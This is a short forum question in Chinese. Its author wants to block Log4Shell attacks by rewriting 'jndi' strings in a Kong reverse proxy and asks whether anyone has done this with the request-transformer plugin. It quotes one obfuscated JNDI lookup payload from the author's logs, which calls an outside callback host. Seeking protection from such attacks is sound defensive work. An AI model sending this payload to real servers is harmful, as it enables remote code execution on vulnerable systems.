我正在使用kong 反向代理来代理我的 Web 服务器的每个 HTTP 请求。我想通过查找和替换关键攻击者的字符串(如“jndi”)来缓解当前的 log4j 问题(“ log4shell ”)。例如,我发现这是我的日志:
${jndi:${lower:l}${lower:d}a${lower:p}://xxx.log4j.bin${upper:a}xxx.xx:80/callback}
我认为这可以通过使用请求转换器插件来完成。有人已经这样做了吗?
PS只是替换jndi
为disabled
太深远了,破坏了很多东西。